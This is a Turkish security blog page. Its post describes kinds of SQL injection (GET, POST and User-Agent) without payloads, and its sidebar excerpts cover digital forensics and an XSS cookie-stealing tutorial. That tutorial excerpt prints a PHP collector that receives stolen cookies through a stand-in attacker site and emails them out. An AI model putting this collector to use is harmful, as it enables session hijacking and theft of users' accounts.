Sql injection ve bilinmeyenleri

-
Sql injection web uygulamalarında inputtan gelen verinin direkt olarak veritabanına işlenmesi sonucu ortaya çıkan zafiyet. 
//input(kullanıcıların veri girişi yapabildiği bölümler)

Sql injection çeşitleri

Sql injection açığının Inputlar ile alakalı olduğunu söylemiştim. 
Cesitlendirmede de input türü önemlidir. 

Get method sql injection

Çoğumuz sql injection zafiyetinin sadece url deki php?id= sonunda olduğunu sanarız(En azından yeni başlayanlar öyle sanıyor) get method dediğimiz işte budur yani veritabanı sorgusunun url sonundaki sayı(genellikle sayı kullanılır) ile yapılması durumunda ortaya çıkan get method sql injection zafiyetidir. 

Post method sql injection

Formdan gelen veri filtre edilmeden veritabanı sorgusuna eklendiğinde ortaya çıkan zaafiyet. 

User-Agent method sql injection

Bazı sistemler sizin kullandığınız cihaz yada tarayıcı hakkında bilgi sahibi olmak ister. Bu bilgiye User-Agent denilir. Ve bu bilgi veritabanı sorgusuna filtre edilmeden girdiğinde anladın sanıyorum ne olduğunu. 
Peki injection nasıl yapılacak diye sorduğunuzu duyuyorum. Bazı tarayıcı eklentileri User-Agent bilginizi degistirmenize olanak sağlar.  Bu tarayıcı eklentilerinden birini kullanıyorsanız ve Manuel sql injection bilgisine sahip iseniz User-Agent method sql injection zafiyetlerini exploit edebilirsiniz

Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

XSS Cookie Çalma

-
Selamın Aleykün Uzun Soluklu anlatımlara Tekrardan dewam Ediyorum.. Bloguma sıradan bir okuyucu olarak giriş yaptığımda makalelerin çok kısa ve anlaşılmaz olduğunu farkettim.. Not defteride öyledir değilmi sadece yazan anlasa yeterli olur.. Ancak okuyucu Faktörünü Göz Önüne Alarak yazmaya dewam edeceğim inşşallah.. Şimdi sizinle beraber bir site kuracağız.. Bu site saldırımızda bize yardımcı olacak.. Ben sitenin adını Taşıyıcı koymak istiyorum.. Çünkü site cookie bilgilerini bize taşımakla görevli.. Sitemizin adı:[ http://Tasiyici.com ] Bu gerçek bir domain değil anlaşılır olması adına bu ismi kullanıyorum.. Umarım daha önce web sitesi kurmuşsunuzdur.. Çünkü o konuya girersek işin içinden çıkamayız.. Ben direkt olarak php kodunu vereceğim.. <php? $cookie = $_GET[’data’]; $kime = "Buraya Mail Adresimiz yazılacak.."; $konu = "cookie"; mail ($kime,$konu,$cookie); ?> Bu kodlar php kodlarıdır.. Bilgisayarınızda çalışmazlar.. Bunları bir web
Devamı

Adli Bilişim Programları

-
Evet Arkadaşlar yeni Bir Yazı İle Karşınızdayım.. Bu Yazıda Konu Bir Sistemi Hacklemek yada sistemden Veri Sızdırmak Deil.. Hacker Olmak istiyoruz değil mi.. Bu İşte Kararlıyız.. En Baştan söyleyeyim bu İş çook tehlikelidir.. Bir Anda Kapı Çalınır.. Açarsın Polis.. Adını? Sorarlar.. Benim Dersin.. Tutuklusunuz Derler.. Afallarsın.. Bilgisayarına El Koyarlar.. Ne Oluyo Yaw.. Dersin.. Seni Emniyette Memnun edeceklerini söylerler.. Hiç bir soruya tatmin edici bir cevap vermezler.. Dahası Küfrederler.. Telefonuna El Koyarlar.. Şimdi dersiniz ki ne anlatıyo bu.. Hangi Film.. Film deil arkadaşlar.. İş ciddi.. Dolandırıcılıklar.. Hırsızlıklar Artık Bilgisayar Üzerinden Gayet Kolay yapılabiliyor.. Kim mi Yapıyor.. Hackerlar.. Bilgisayar Dehaları.. Ve Bazende Benim gibi Bilgisayar Sapıkları.. Hackerlar Ve Bilgisayar Dehaları Zaten Çook Akıllı Oldukları İçin yakalanmayacak stratejiler Kullanırlar.. Benim Gibilerse biraz Daha Geç İdrak Eder.. Kullanıcı Bilgilerini..
Devamı

FTK Imager yazılımı kullanılarak image almak

-
Resim
-== GİRİŞ ==- Image Almak Ne demektir ? Image ingilizcede resim anlamına gelmektedir. Ancak adli bilişim penceresinden bakarsak bunun faklı bir anlamı vardır. Kelime bu anlamı ilk anlamından ötürü kazanmış olabilir. Adli Bilişim Dijital Delillerin incelenmesini ve korunmasını konu alan yeni bir disiplindir. Filmlerde olay yeri inceleme ekiplerinin olay mahaline vardıklarında kurban'nın ve olay yerinin detaylı fotoğraflarını çektiklerini görmüşüzdür. Bunu olay yerini yada kurbanı daha sonra bozulmadan inceleme fırsatı bulabilmek için yaparlar. Çünkü kendileri olay mahâlinden ayrıldıktan sonra bir takım deliller zamana bağlı olarak zarar görebileceği gibi birileri tarafındanda karartılabilir. Aynı olasılıklar dijital deliller içinde geçerlidir. Bu nedenle olay mahaline varıldığında kurbanın yada failin,(fotoğrafını çektiğiniz sırada bunu bilemeyebilirsiniz) (her iki durumda da zanlının(aslında zanlıya ait olan depolama aygıtının)) fotoğrafını çekmeniz gerekir. Bu
Devamı